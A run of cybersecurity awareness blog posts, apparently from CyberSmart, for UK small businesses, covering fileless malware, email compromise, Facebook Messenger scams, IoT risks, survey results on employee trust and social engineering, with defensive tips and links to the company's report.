The most elusive of all malware; fileless malware is a threat you can’t afford to let slip off your radar. It accounts for 40% of global malware, according to research from Arctic Wolf Labs. And attacks increased by an eye-watering 1,400% between 2022 and 2023. 

The next time you’re assessing cybersecurity priorities, keep protecting your business from these furtive attacks front of mind. 

What is fileless malware?

Fileless malware is malicious code that’s written to your RAM or legitimate system tools rather than your disk (SSD or hard drive). Essentially, it uses your system’s software, applications, or protocols to launch an attack. Technically, it’s not actually fileless, but the name comes from where the code is stored and the fact it uses what already exists in the system. 

The hacker will use the malicious code to gain access to your systems, execute the code by piggybacking on legitimate script, and steal credentials, encrypt files etc. – whatever they’ve set out to do as part of the attack. 
Because code is stored in memory, it generally disappears when you reboot your system (unless the hacker uses more advanced tactics to make the malware stick around on restart). This makes the virus incredibly difficult to spot, meaning security teams and antivirus software may not notice or find out what caused the problem.

Want to know more about the threats facing small businesses like yours? Check out our latest report on SMEs and the cost of living crisis.

Some fileless malware techniques

Living off the land binaries (aka LoLBins)

LoLBins primarily refer to pre-installed Windows binary tools used for default system operations. PowerShell, a Windows scripting language, is an example of this. However, hackers can take advantage of them to launch attacks and avoid detection. 

Memory code injection

A memory code injection inserts malicious code into a computer’s memory. 

Fileless malware examples

Operation Cobalt Kitty

OceanLotus Group, who also go by APT32, targeted an international company based in Asia. The long-term attack compromised more than 40 computers and multiple servers. 

They used the Windows PowerShell configuration management tool as an entry point for malicious code. It manipulated network management services so it would stay on systems rather than getting deleted on start-up.  The group managed to penetrate the organisation via spear-phishing emails to senior employees that encouraged them to click on malicious links or download weaponized documents.

Fritz Frog

Fritz Frog is a fileless and serverless peer-to-peer botnet and worm that uses brute force to access secure shell (SSH) servers.  

In January 2020, the cybercriminals behind it launched an attack that lasted for eight months, affecting 24,000 SSH servers from government, education, healthcare, and private enterprises.

Once the malware had successfully compromised a server, it would replicate and spawn threads to achieve different goals, e.g. one would use brute force to access more targets while another deployed the payload. It did this so it could run a cryptocurrency miner to process and steal cryptocurrency transactions from Monero.

Code Red 

Identified as the first-ever fileless attack, Code Red spread worldwide in 2001 and affected more than 300,000 servers.

The worm exploited a Windows vulnerability and affected users of Windows NT, Windows 2000, and Microsoft IIS web server software. It caused websites using the webserver to display incorrectly.

According to a Sophos threat researcher, Microsoft released a patch to protect against the vulnerability just a month before the attack, showcasing the importance of updating software as soon as patches are available. 

How to protect your business

Fileless malware is particularly tricky to detect because it’s written into memory or trusted, legitimate code. That means standard antivirus software doesn’t always detect a problem. And, in cases where the code is written to memory and wiped on restart, there’s no trace of the malicious code to work from. 

However, there are some steps you can take to look after your cyber hygiene and give your business the best defence against malware in general, including fileless malware. 

Patch your systems

Just like Code Red, unpatched vulnerabilities in operating systems, browsers, and software are a breeding ground for cyber threats. To counter this, install patches and security updates as soon as they’re available to give your business the best protection. 

Continuous logging and monitoring 

It’s important to stay on top of any security incidents so you have a full understanding of your IT infrastructure. It’s also important to monitor your systems for any unusual activity so you can respond to potential threats quickly and limit the damage. This can be difficult to do in-house unless you’re a very big business with lots of cybersecurity experience, but there are many options for third parties to monitor your security for 24/7 protection.

Education

To avoid threats, your people need to understand them. And the same is true for fileless malware. So, make cybersecurity training regular, bitesize, and as fun as possible. It’s not about fearmongering, it’s about arming your teams with knowledge. 

Endpoint protection

An endpoint is a device that connects to and exchanges information with a computer network. Endpoint protection includes measures such as device encryption, perimeter security on cloud storage, network access control, anti-malware, and more. 

Get Cyber Essentials certified

Cyber Essentials is a government-backed scheme with a simple framework based on five technical controls. Many of these controls include actions that overlap with our other tips in this section, so you can tick more off your to-do list in one go. 

1. Secure configuration
2. Malware protection
3. Network firewalls
4. User access controls
5. Security update management

It’s a great starting point for businesses looking to improve their cybersecurity credentials before moving on to more complex and costly certifications like ISO 27001. And, if you’re unsure which option is best for you, start by reading our free guide to certifications in the UK.

The fight against fileless malware

Hopefully, these tips help you to feel more confident about protecting your business against fileless malware. 

However, as with all threats, fileless malware is ever-evolving. One way to ensure you stay cyber confident is to keep updated with information on new threats. Our report on SMEs and the cost of living crisis tells you everything you need to know about how small businesses are tackling cybersecurity during an economic downturn. Read it here.

Malware attacks are a well-known concern for businesses, but what type of business is more at risk?

Small businesses are just as at risk as large enterprises. In fact, 54% of SMEs reported experiencing between one to five cyberattacks in a 12-month period. 

Let’s explore why. 

Small businesses and malware attacks

Small and medium-sized businesses (SMEs) are less likely to have robust protocols in place to mitigate a malware attack. They might not be aware of the risks, understand what a malware attack looks like, or have the ability to react if one occurs.

And cybercriminals take advantage of unprepared businesses. 43% of cyberattacks target SMEs. Their entry points might not be as closely guarded as a larger company, and employees might not know what to do if one occurs – or even be able to identify it in the first place. Most notably, 75% of SMBs could not continue operating if they were hit with ransomware.

The cost of living crisis has hit small businesses particularly hard. But what does this mean for SMEs’ cybersecurity? Find out in our latest report. 

The types of malware attack

Every malware attack will look slightly different, making them hard to identify. To help you stay aware, let’s take a look at the most common types. 

• Ransomware works by grabbing your attention. It disables your company’s data using encryption until a financial ransom is paid.
• Spyware collects information from targets without their knowledge. It’s unknowingly downloaded and installed onto your devices.
• Adware displays intrusive advertisements that reappear when closed. It’s usually delivered as a high number of pop-ups that disrupt your systems.
• Trojan malware is disguised as something it’s not. Users unknowingly download it, believing it to be legitimate software. 
• Mobile malware works by installing itself onto your mobile devices. This can be an issue if you use a mobile to access sensitive business data.
• Bots perform automated tasks on demand. When they make their way onto your system, it runs malicious tasks automatically. 
• Worms access your systems through unintentional software vulnerabilities. This is why it’s important to keep systems up to date. 
• Keyloggers monitor keystrokes on infected devices to collect sensitive information, like passwords. 
• Fileless malware hijacks software and tools you already use. 

A stage-by-stage breakdown of a malware attack

Every malware attack is different, but some of them follow a similar pattern. Learning how to spot a malware attack is key to preventing one before it’s too late.

Here’s a breakdown of what you can expect.

1. Gathering information

A cybercriminal is unlikely to target a business that they know has tough defences. So they’ll start the process by gathering information on your business. 

They’ll identify the systems or software that you use and any potential vulnerabilities. If they find some, then your business is more likely to be a target. 

2. Targeting

The cybercriminal will make their choice of malware to target you with. 

They’ll conduct their activities to begin infiltrating your organisation. For example, they might start sending phishing emails with malware attached to it. This will depend on the type of malware they choose. Be aware that malware can be incredibly sophisticated, so this type of attack can come from a device, email, software, or any channel in your business.

3. Delivery

The attacker will spread the malware to your business. This could be across your systems and software, or directly to employees. Hackers only need a single vulnerability to get in, so will exploit as many entry points as possible. 

4. Exploitation

This is when the malware is triggered. It establishes a foothold on your systems by exploiting the vulnerabilities it has found. Malware can also begin to replicate itself, alter your systems, and even autonomously update the cybercriminal on its progress.

The malware will begin to disrupt your systems, software, and people. It can also steal sensitive information. 

How can your small business avoid malware attacks?

SMEs are inherently more at risk as they’re less likely to have robust cybersecurity measures in place. However, it doesn’t have to stay that way.

You can mitigate the risk of a cybercriminal choosing your business by:

• Improving employee training
• Implementing data encryption
• Using firewalls
• Managing user access
• Updating software and operating systems
• Obtaining a cybersecurity certification

If you’re wondering how you can achieve all these steps fast, then a cybersecurity certification is the answer. It requires your business to comply with a strict set of cybersecurity measures to qualify. Therefore, it’s an easy way to make sure you’re following best practices. 

It incorporates every step, from employee training to regulating firewalls, so that no cybersecurity measure is left unturned. So when malicious cybercriminals find your business, you’re less likely to be a target. 

Want to know more about the threats facing small businesses and how they’re dealing with them? Check out our research on SMEs and the cost of living crisis. 

We all spend almost every day plugged into our emails. For most of us, this is our primary source of communication with the rest of the world – whether for work or our personal lives.

However, despite its utility, email communications can have a darker side. This blog will help answer what threats exist, why email security matters, and, most importantly, what can be done to defend against these threats. Plus, we will look at a real-life case in which email was used to steal hundreds of thousands of pounds.

What vulnerabilities could exist in my email security?

So, what vulnerabilities could exist when using your email? The first and greatest threat is phishing, I won’t discuss this further as there is already lots of good information available about phishing, including this blog post.

Phishing also has a close cousin. We’ve all received an email at some point from what appears, on first look, to be a legitimate sender. For instance, you might receive an email from an address at ‘arnazon.com’ asking you to update your card details. It looks legitimate if you just glance at it (which is what cybercriminals are banking on) but leads to a fake corporate website which cybercriminals will use to steal your financial information. This is known as ‘spoofing’. 

Another vulnerability which extends beyond email is weak authentication. In layman’s terms, this is having a poor password. A password that is either short or one that is easily guessable, such as a piece of information that is known by you. For example, your pet’s name or your birth date. 

This information can be used to launch further threats, such as man-in-the-middle attacks. This involves intercepting and potentially altering email communication between two parties to deceive or scam one or both parties.

Of course, these are only a few of the many vulnerabilities that exist, but they give us an idea of what is out there.

Did you know that 49% of SME leaders feel more at risk of cyberattack since the beginning of the cost of living crisis? Read our new report to find out why.

What are the possible impacts of these vulnerabilities?

It’s easy to assume that email security is not your greatest concern. Why would anyone want to attack you? Well, there are many reasons, whether using your personal email or work email, these are some of the possible impacts you could experience:

Identity Theft

Identity theft can lead to financial losses for you or your business, reputational damage and even legal issues.

Malware Infections

A successful malware attack could lead to the loss of important proprietary or customer data. This could prevent your business from being able to operate.

Data Breach

Sensitive information could be stolen and used against you. This could be intellectual property that could disadvantage your business. And this could see your business breach regulations and face legal consequences and receive fines.

The breached email and inheritance theft

Whilst working as a cybercrime detective in the police, I dealt with many cases that involved email as the attack method.

One such case involved a solicitor. As you can imagine, security is a top priority considering the sensitive data solicitors process. And, this solicitor had done almost everything right. They had a business-owned domain and an IT team to look after it and ensure security. 

The firm’s security measures included IP whitelisting (which will be key in a minute). ‘Whitelisting’ is a security strategy that prevents users from logging into internal company platforms from anywhere other than ‘trusted locations’. For example, a ‘trusted location’ could be your head office or coworking space. In this case, there was only one trusted location, the solicitors’ office. 

What went wrong? 

Due to the pressures of the job, one solicitor in the firm decided to work outside of the office in the evenings and on weekends. To do this, they created a new email using the solicitors’ business name.

Here’s where things go wrong.

Unfortunately, this account was discovered by a cybercriminal and a weak password allowed them access to the inbox. The cybercriminal noticed one conversation that piqued their interest. The solicitor was dealing with an inheritance case and was working with the deceased’s family to distribute assets and money from the deceased’s will. 

The cybercriminals hijacked this conversation. Adding a forwarding rule so that any responses would be forwarded into a concealed folder. Preventing the solicitor from seeing them as well as allowing the messages to be altered and dropped back into the solicitor’s inbox.

The cybercriminals intercepted an email from one of the family members containing a document which detailed the bank account the inheritance money was supposed to be transferred to. Seeing this, the bad guys pounced, changing the bank details to their own.

The solicitor logged this information and continued with the formalities. A few days later, the money was transferred and the cybercriminals found themselves hundreds of thousands of pounds richer.

How to protect yourself when using email

So, what can you do to protect yourself? 

The good news is, by reading this blog you’ve taken the first step by improving your awareness. Understanding what types of threats exist and being alive to this ever-present danger will ensure that you start from the best possible place.

But it doesn’t stop there. Education is an ongoing process and if we truly want to protect ourselves, learning shouldn’t be something we do once a year. So keep working on your cybersecurity knowledge. This could be through security training or simply through reading blogs like this. 

As we saw in the case above, weak authentication was the gateway to this attack. Using strong passwords is crucial. This can be achieved by using the three random words principle, as recommended by the NCSC.

On top of this, use multi-factor authentication (MFA). This attack, and others like it, could have been foiled with this extra layer of protection. 

Finally, it is worth speaking with your IT teams to make sure that they implemented technical controls. This includes email filtering, to identify and block malicious content before it reaches you. As well as technologies like SPF (Sender Policy Framework) and DMARC (Domain-based Message Authentication, Reporting, and Conformance) to authenticate email sources.

Want to know more about the threats faced by small businesses like yours? Then check out our latest research report on how the cost of living crisis is impacting SMEs.

The current economic climate has seen better days, but how are the UK’s small businesses weathering the storm? At CyberSmart, we’re curious about how the cost of living crisis has impacted cybersecurity and people in small businesses.

We tasked Censuswide with surveying 1,000 UK SMEs to find out how they’re coping. What followed is our  ‘SME cost of living crisis report’. It explores:

• How confident businesses are about weathering the economic storm
• The financial limitations impacting businesses
• The impact on employees
• The key impacts on cybersecurity
• The state of cybersecurity investments 
• How SMEs can approach cybersecurity in the cost of living crisis

Despite economic conditions, cybersecurity in your business doesn’t need to be all doom and gloom. Our report gives you the knowledge and understanding of the current climate to proactively protect your business. To help you, here are our key takeaways from the report. 

Want to read the report in full? Get your copy here.

1. Cost-conscious businesses are looking for value

Small businesses must be cost-conscious. Careful budgeting and knowing when to invest is key to survival. And this means many small business leaders won’t invest in cybersecurity unless they know the payoff is worthwhile. 

Understanding the benefits of strong cybersecurity is key in these conditions. Without a good level of understanding, decision-makers will overlook its importance.

Understanding the benefits of strong cybersecurity is key in these conditions. Without a good level of understanding, decision-makers will overlook its importance.

2. Economic uncertainty raises threat levels 

Even though businesses are overlooking the importance of cybersecurity, nearly half of UK SMEs (47%) believe they’re at greater risk of a cyberattack since the onset of the cost of living crisis. 

Economic uncertainty has led to mistrust, too. 38% of leaders are worried about malicious insider threats from employees, while 32% blame higher rates of supply chain fraud. It seems that mistrust comes from inside and outside.

This is why increasing cybersecurity protocols and governance offers real business value. It provides much-needed reassurance that business data is safe, no matter where threats come from.

3. The employee skill gap is causing mistrust

Your employees are a line of defence when it comes to cybersecurity. But you must equip them with the tools and knowledge to counter potential attacks. 

80% of respondents said that their employees do not fully understand why it is important to keep confidential information secure. And this lack of cybersecurity knowledge is the leading reason for mistrust.

The cybersecurity knowledge skills gap is a prominent factor for uncertainty. Of the 620 SME leaders who claimed to trust their employees, 25% still believe that staff pose the greatest security risk.

4. SMEs are missing important cybersecurity policies 

We noticed that a lack of trust in employees, their cybersecurity knowledge, and no clear internal policies have an underlying impact on small businesses, so we did some digging.

Only 54% of SMEs have clear policies and procedures for sharing information and gaining access to confidential information. This means that just under half of SMEs don’t have important cybersecurity policies, at all. 

It’s not surprising that leaders demonstrate a lack of trust in their employees, especially when there’s no guidance for the employees in the first place. Here, cybersecurity concerns appear as a vicious circle, and there’s an important gap in employee knowledge and a lack of policies.

5. Basic measures can help to protect businesses

The report reveals that fixing basic, underlying issues can help alleviate the cybersecurity concerns as a result of the cost of living crisis. These issues are:

• Lack of employee cybersecurity training and resulting cyber confidence 
• Missing cybersecurity policies, or too few policies 
• Misunderstanding of the value of cybersecurity tools 

Luckily, investing in cybersecurity doesn’t have to cost the earth. Instead, SMEs must be smart about their investments and increase cyber confidence for their employees.

Our report takes an in-depth look at these steps and how SMEs can implement them. These steps can help increase cyber confidence in your business and protect against cybersecurity threats.

Cyber confidence is key in the cost of living crisis

Uncertain economic conditions can make even the most stable business leaders feel on edge. Improving cybersecurity governance can help decision-makers protect their business and provide much-needed reassurance that their cybersecurity is under control. 

Read our report today to learn more about the current concerns of SMEs in the cost of living crisis, and how to mitigate cybersecurity threats.

At CyberSmart, we recognise that the cost of living crisis not only affects our personal lives, but the way small and medium businesses (SMEs) manage their priorities, too. 

Uncertainty is never the best feeling for any business leader. A dampened economic outlook can result in SMEs becoming more cost-conscious and less growth-minded. And we’re concerned about the impact on cybersecurity. 

That’s why our latest insight, the SME cost of living crisis report, explores its impact on SMEs, leadership, the workforce, and business cybersecurity.

What’s in the report?

We tasked Censuswide with surveying 1,000 UK SMEs to reveal the current state of the cybersecurity landscape for SMEs. 

The report is full of helpful statistics, figures, and insights that reveal the behaviours of decision-makers during the cost of living crisis.

In the report, you’ll learn about:

• What’s driving decision-making in the cost of living crisis?
• The impact on cybersecurity investments 
• Leadership behaviours and mistrust of employees
• Cybersecurity policy and governance factors
• How should SMEs approach cybersecurity in the cost of living crisis?

Discover CyberSmart’s SME cost of living crisis report. Learn more about the impact on cybersecurity, people, and more. Read it today.

Discover key insights about the cybersecurity landscape

At CyberSmart, we work to make cybersecurity simple and accessible to everyone. We aim to provide every business, no matter how small, the tools to protect themselves against cybersecurity threats easily and effectively.

That’s why we’ve incorporated our expert insight into the report, too. We deep-dive into the reasoning behind the report’s findings to support the facts and figures. This provides you with a better understanding of the current SME cybersecurity landscape. 

For example, the report reveals that nearly half of UK SMEs (47%) believe they’re at greater risk of a cyberattack since the onset of the cost-of-living crisis. Why? External threats, insider threats, employee mistrust, and employee negligence are all driving this behaviour, and we explore this in the report. Read it for free today to get the latest insights into SME cybersecurity during the cost of living crisis. 

Almost since its birth, Facebook has been an important tool for small businesses. It’s a low-cost way to sell your services, interact with customers and build a community around your business.

However, wherever small businesses gather in any number, so too do cybercriminals, like predators at a Savanna watering hole. Facebook for Business is no different. Over the past few years, the social media app’s messaging service has become a regular launchpad for phishing campaigns. And, unfortunately, the problem is only getting worse, with social media account takeovers increasing by over 1,000% in the past year

However, this doesn’t mean you need to avoid the app altogether (as we said, it’s a useful tool). With the right knowledge, you can get back to communicating confidently. So, here’s everything you need to know about Facebook Messenger scams – what they look like, the consequences of a breach, and how to combat them.

What does a Facebook Messenger phishing scam look like?

Like most phishing attacks, Facebook Messenger scams typically rely on social engineering. But, there are a few different approaches out there.

Complete cyber confidence doesn’t have to break the bank. Download our guide to protecting your business on a budget to find out more.

The classic Facebook scam

First of all, there is what we call the ‘classic’ Facebook messenger scam. This is a well-worn approach but don’t let that fool you. ‘Well worn’ doesn’t mean ineffective even if it lacks sophistication. A surprising number of businesses still get caught out by this tactic.

Scammers will usually pretend to be potential potential customers or partners and try to trick you into giving them sensitive information. It could be a prospective ‘partner’ who just needs some financial data before they can commit or it could be a customer who’s seemingly desperate for you to check out their website (don’t click the link!). 

The Facebook support team scam

Recently, we’ve seen a far more insidious scam on the platform. Scammers have begun posing as Facebook support or security teams.

This scam typically starts with a message claiming your business page is at risk of being banned or disabled due to violations. The message will seem urgent and official, often using Facebook branding and logos. There will be a link provided to supposedly “verify your account” or appeal violations. Unsurprisingly, this link doesn’t unlock your account or clear your business’s name, it’ll usually lead straight to a bogus site that’ll infect your device with malware.

Another potential avenue for this kind of scam is to claim your business needs to ‘top up’ the funds paid for ant on-site advertising you might be running. Once again, this will lead you to a spoofed Facebook page where you’ll be requested to enter sensitive financial details. If you’re unfortunate, like us, you might have received a flood of these messages in recent months, they usually look something like this:

What are the consequences of a successful scam?

The consequences of falling prey to one of these scams vary, depending on what the cybercriminals managed to persuade the victim to do. However, some of the most common outcomes include:

– Losing control of your business’s social media page to hackers who then use it to post malicious content or launch further scams

– Financial loss, either through the initial scam or a subsequent ransomware attack

– Compromised sensitive personal or proprietary data 

– Reputational damage from all of the above

All in all, being hit with a successful Facebook Messenger scam is something your business desperately needs to avoid. Let’s look at how…

How can you avoid falling victim?

Although the method of attack might be new, Facebook Messenger scams are still a form of phishing. This means that many of the principles that can be used to combat other types of phishing scams can be applied here.

1. Keep Facebook’s policies in mind

Remember that Facebook will never message you proactively about account issues. Any unexpected warnings about your page being banned are very likely scams.

2. Check the URL

Verify that any links come from an official facebook.com or facebookmail.com domain. If you’re unsure, you can hover over links to preview the URL before clicking.

3. Look for errors

Watch for poor grammar, spelling errors, and other typos. Scammers are rarely gifted writers and you’ll often find telltale slip-ups in their messages.

4. Verify who the sender is

Check out who a potential partner or customer is claiming to be before you engage with them or share any information over Messenger. A quick search of their name on LinkedIn and a check of the company website or its Facebook Business page should be enough to raise any red flags. And, if in doubt, don’t engage. 

5. Use MFA

Turn on multi-factor authentication (MFA) for your Facebook and Facebook Business accounts. This will make it much harder for a cybercriminal to gain access to your account even if they do steal your login credentials.

6. Don’t trust unusual requests 

Don’t trust any request for your login credentials, password, or MFA code that comes through Messenger. Facebook will never ask for that information through chat.

7. Prioritise privacy 

Keep your Facebook Business page set to the highest privacy and security settings. This alone should help keep you off most scammers’ radar.

8. Report anything fishy

Finally, report any suspicious activity to Facebook. Any examples you can provide are crucial to improving the platform’s security and rooting out malicious users.

As with all phishing attempts, Facebook Messenger for Business scams aren’t particularly sophisticated and can be avoided with a little vigilance. Follow the steps laid out above and you’ll be able to do business using Facebook safely and securely. 

Want to know more about the threats facing small businesses and how to guard against them? Check out our guide to protecting your business on a budget.

Like an unwanted guest causing friction at a party, malware can disguise itself, trick your employees, and cause problems for your business. Here are some tell-tale signs of malware attacks to help you detect threats and show them the way out. 

What is malware?

Malware is an umbrella term for malicious software that will harm your business systems. It’s designed to disrupt computers, networks, devices, and operations. 

5 signs of a malware attack

1. Your device’s performance will suffer

If you notice your device running slowly, crashing, or freezing, and it’s not a sluggish internet connection or because you’re next in line for a new machine from IT, then it might be malware knocking at your door. 

It’s difficult to define how obvious and extreme the disruption will be, as this depends on the type of malware. Some types will use up most of your computer memory, making it extremely frustrating to use your machine or run standard programs and apps like Microsoft Excel or web browsers.

2. Your interface will look different

If you notice your search engine wearing fancy dress, beware. We don’t mean a change like Google Doodles – look out for your default browser changing or redirecting you to another site, and new, unfamiliar browser extensions. This is known as browser hijacking – a malware that makes your browser malicious to compromise your systems.

Malware can also change or delete files, folders, or desktop icons, so if something looks odd or out of place, exercise caution. 

Want to improve your cybersecurity but not sure where to start? Check out our free guide to protecting your business on a budget.

3. Mysterious communications

Like someone sending a party invite on your behalf, malware can allow hackers to send emails, messages, or post on social media without your knowledge or consent. Keep an eye on any company or personal accounts you access from work devices to make sure all posts are legitimate. Check your email sent box, too. 

4. Unusual activity

Hackers may use malware to access your accounts, steal passwords, disable your security software to avoid being noticed, or connect to networks to compromise them. You might also notice unusual financial activity. Hackers achieve this using keyloggers – a type of malware that monitors your keystrokes, allowing cybercriminals to duplicate sensitive information like payment details and passcodes. 

If you notice any inexplicable traffic or activity on your accounts and security systems, flag the problem with your IT department or cybersecurity support provider. 

5. Ransom demands

More like a loud intruder than a discreet party crasher, you can’t miss a ransom demand. A hacker will use ransomware to encrypt files, or even your entire computer, to stop you from accessing what you need. The hacker will then demand you pay a ransom for decryption, but there’s no guarantee paying will result in success – 92% of companies that pay ransom don’t get their data back, so be wary of trusting the word of a cybercriminal. 

Mighty malware attacks

NotPetya

In 2017, NotPetya, a Russian ransomworm, went global and caused widespread damage and disruption to businesses. It encrypted files and the hackers behind it demanded ransom for decryption. The attack, which cost $10 billion in total damages, according to a White House assessment, affected behemoths like Maersk, Reckitt Benckiser, and Mondelēz.

MyDoom

The worm – malware that can replicate and spread quicky – first emerged in 2004, but is still active today, and has costed an eye-watering $38 billion in damages. It works by sending an email with a malicious attachment. Once opened, the attachment downloads software that mines for email addresses and sends the virus to all your contacts, perpetuating the problem. MyDoom has also been used to take control of users’ computers and launch distributed denial of service (DDoS) attacks. In 2004, it took down Google for an entire day.

Show malware the door

Now you know the signs of a malware attack, what should you do if you experience one of them? Here are some quick actions that will help to slow or stop the spread of malware, like a bouncer protecting a venue from getting overcrowded with revellers:

• Communicate the issue, following your business’ cybersecurity procedures
• Disconnect from the internet
• Don’t log in to anything 
• Put your computer in safe mode
• Run anti-malware software
• Check and verify your web browser
• Remove suspicious browser extensions
• Clear your web browser cache

It’s vital that you communicate the incident to the colleague, department, or company that looks after your cybersecurity. If you have access to a 24/7 cybersecurity monitoring, check with your provider, they may already be aware of the problem and working to solve it. Either way, working together and communicating effectively will help you to keep the malware at bay and limit damage to your company data.

As Black Friday and Cyber Monday approach, anticipation is growing for this year’s snips, steals and deals on Internet of Things (IoT) devices. However, amid the thrill of Black Friday bargains, it is crucial to exercise caution and consider the potential security implications associated with purchasing and deploying IoT devices. 

What is IoT?

The Internet of Things, commonly referred to as IoT, is essentially a web of gadgets that share information and the cloud.

The concept first came about in 1982 when Carnegie Mellon University students linked the department vending machine to their computer, allowing them to check if drinks were in stock and chilled.

However, this wasn’t the first true IoT device, as Tim Berners-Lee’s World Wide Web was still seven years in the future. That honour goes to a toaster created in 1990 by John Romkey. This bizarre device was equipped with a crane system for inserting the bread.

IoT has continued to expand from here and, based on the most recent data, around 15 billion IoT devices are currently connected. It’s anticipated that this number will nearly double, reaching 29.42 billion by 2030.

Want to protect your business but not sure where to start? Check out our free guide to protecting your business on a budget.

Where is IoT used  – The good, the bad and the bizarre

IoT is used in our homes, offices, manufacturing machinery, agriculture and more. More specifically, this includes smart home devices such as fridges and dishwashers, wearable technology like smartwatches, and medical devices, with pacemakers being a great example.

IoT has the potential to enhance our lives. For example, by facilitating independent living for the elderly with conditions like dementia. This is achieved through IoT technology that gathers atmospheric data linked to residents’ movements within their homes. Should the activity drop below a certain threshold, a device will immediately notify family members or carers of a potential emergency.

Whilst working as a detective in the police, I saw IoT employed for malicious purposes on many occasions. One such occasion was when following a recent relationship separation, the one-time couple had to maintain contact due to their young child. However, whilst Mum was out with her baby she would frequently bump into the child’s father. 

After months of this and other strange activities occurring, it was discovered that a tracking device had been placed in the child’s pushchair. This shared real-time location updates and allowed impromptu meets between father and child.

As you might expect, there are also many bizarre IoT devices out there, including smart egg storage devices that can track the age of eggs and send alerts when your egg stock is running low. Although some may say that is a cracking idea!

IoT security vulnerabilities

A security vulnerability within an IoT device could be several things, from insecure default settings to a lack of physical security. This could allow anybody to log into the device by not requiring authentication. Or, where there are log-in details required, using default credentials such as a username and password of ‘admin’.

Many of us will have IP (Internet Protocol) CCTV both in our homes and places of work. Vulnerabilities may exist in these too. Failing to ensure updates are applied to our CCTV could leave known vulnerabilities unaddressed, making it susceptible to exploitation. I have seen many cases of IP CCTV being hacked and people’s personal lives being streamed live on the internet for the world to watch.

What can we do to protect ourselves?

The first thing that we can all do before we click buy on that new device, is to ensure that we are buying it from a reputable company. There are so many devices available to us for comparatively little cost. But buyer beware, often a low price can mean poor security. 

Although we can’t all be expected to comprehend the intricate technical workings of our devices, we can develop a basic understanding of security best practices. This should help ensure that the IoT devices we bring into our homes or workplaces are safe.

So, what are some of the things you can do? In no particular order, here are some of the basic requirements for cybersecurity.

1. Change default passwords

Ensure that you’re using strong and unique passwords to access devices. If in doubt, use the NCSC’s ‘three random words’ approach.

2. Apply patches and updates

Security updates and patches are extremely important in fixing any vulnerabilities in the operating system or firmware installed on your devices. Without these patches, cybercriminals could easily exploit vulnerabilities to hack into your device. 

3. Configure your routers and firewalls to block external traffic

To keep IoT devices within your home safe, you must ensure that nothing outside your home network can connect to your device. By configuring routers and firewalls to block all external traffic you’ll prevent hacks.

4. Only purchase devices with high-level security protocols

Try and stick to devices with a connectivity protocol that is secure by design and uses a low data throughput such as LoRaWAN (long-range wide-area network). You should find these details in the specs of any reputable products.

5. Check your privacy settings

We’ve already mentioned passwords, but there are a few other things you can do to improve your privacy and security. First of all, set up multi-factor authentication (MFA) on all IoT devices, whether that’s biometric authentication (such as fingerprint or facial recognition), a one-time passcode, or security questions. 

MFA makes it much, much harder for any would-be hacker to gain access to your device even if they manage to find it on a network.  

Finally, the single most important thing that we can all do when it comes to security is to keep ourselves updated and aware of new and emerging threats. So, if you’ve read this far, well done.

One in three UK SME business leaders do not trust some, most or any of their employees with confidential information. This is according to a survey of a thousand SME senior leaders and decision-makers across the UK. The report was commissioned by CyberSmart, the category leader in simple and accessible automated cybersecurity technology for SMES, and conducted by Censuswide*.

Why don’t SME leaders trust employees?

 Of these respondents, 80% maintain this is because employees do not fully understand why it is important to keep confidential information secure (51%) or admit that the company does not have enough checks and balances, or the technology to protect confidential information (29%). A further 40% profess that their wariness is attributed to having been burnt in the past, and 23% believe they have disgruntled or disloyal employees. In fact, employees were ranked as the most likely to expose the company to the greatest cybersecurity risk by 30% of SME senior leaders. This was followed closely by former employees (28%), and interns or temporary staff (23%).

Interestingly, as many as 76% of all respondents believe they, along with other members of the senior leadership team, can keep high-level meetings or confidential information private from employees because they have a secure system in place to communicate and store such information. Yet, when digging deeper into the companies’ security policies and procedures, this appears to be an overstatement. Only 55% and 54% of SMEs have a clear set of policies and procedures for sharing information and gaining access to confidential information, respectively. Moreover, a mere 22% have policies and procedures for de-provisioning former employees, while 13% have none of these policies at all.

“A successful business is led by its people, but they can certainly put companies at risk of a cyber incident whether intentionally or more likely, by mistake. Indeed, this research has shown that the biggest reason SME leaders cannot trust their employees with sensitive information comes down to a lack of security awareness training and the implementation of security measures and policies,” said Jamie Akhtar, CEO and co-founder of CyberSmart. “There even appears to be a discrepancy between the number of businesses that allegedly have secure systems in place and those failing to introduce clear policies and procedures for sharing and storing information as well as managing account access for those leaving the business. It is crucial that SMEs re-evaluate their cybersecurity posture and consider the people, processes and technology components of their strategy for maximum protection.”

Other key findings

• Of the 76% of respondents who claimed to have a secure system in place to communicate and store confidential information, keeping it private from employees, only 60% and 61% have clear policies for sharing information or gaining access to confidential information, respectively. Moreover, only 24% have clear policies and procedures for de-provisioning and 7% have none of these policies.
• Of the 620 people who claimed to trust their employees fully, a quarter still believe their employees are the biggest cybersecurity risk
• Of the 278 people who said former employees were one of the greatest cybersecurity risks, only 24% had clear policies and procedures for deprovisioning
• 7% of senior leaders and decision-makers within the UK believe their employees are cyber savvy and can easily snoop on the company’s network and systems or hack into the company’s emails/messages
• Other parties that are believed to pose a cybersecurity risk to companies include customers (19%), external partners/suppliers (19%), senior leadership (15%) and consultants (12%)
  
  

*The survey was conducted between the 30th of May 2023 and 5th of June 2023.

Read the report in full and download your free copy here.

October is Cyber Security Awareness month, so we’re focussing on a frequently seen threat, social engineering. During my time as a Detective Sergeant leading the Dorset Police Cyber Crime Team, social engineering attacks became one of the most common offences. So, based on my experiences, let’s look at what they are, how they work, and what you can do to guard against them. 

What is social engineering and why should I care?

Social engineering involves an attacker using various methods to manipulate a person into doing what the attacker wants them to do. Social engineers leverage key principles to successfully achieve their aim. These principles include:

• Authority – This relies on the fact that most people will take instruction from someone who appears to be in charge
• Intimidation – Scaring or bullying an individual
• Consensus – People will often want to do what others are doing
• Scarcity – Making something appear more desirable because it may be the last one
• Familiarity – The recipient likes the individual or organisation the social engineer is claiming to be
• Trust – The Social engineer builds a relationship with the target
• Urgency – Creating the feeling that action must be taken immediately

Each of these principles will trigger an emotional response in the recipient, this is what the attacker relies on. When we react emotionally, we are not thinking clearly.

Social engineering is the cyber criminal’s go-to tool for achieving their aims. This could be stealing data, money or your identity. The final victim of the attack may not even be the person that is socially engineered, the victim could be their employer or even a loved one. 

The impacts of this can be significant, whether it is a big financial loss, reputational damage or even the psychological stress caused. In a worst-case scenario, this could lead to a business closing down or an individual coming to harm.

Want to protect your business but not sure where to start? Check out our free guide to protecting your business on a budget.

How big a problem is social engineering? 

The stats don’t lie! Social engineering is a significant problem.

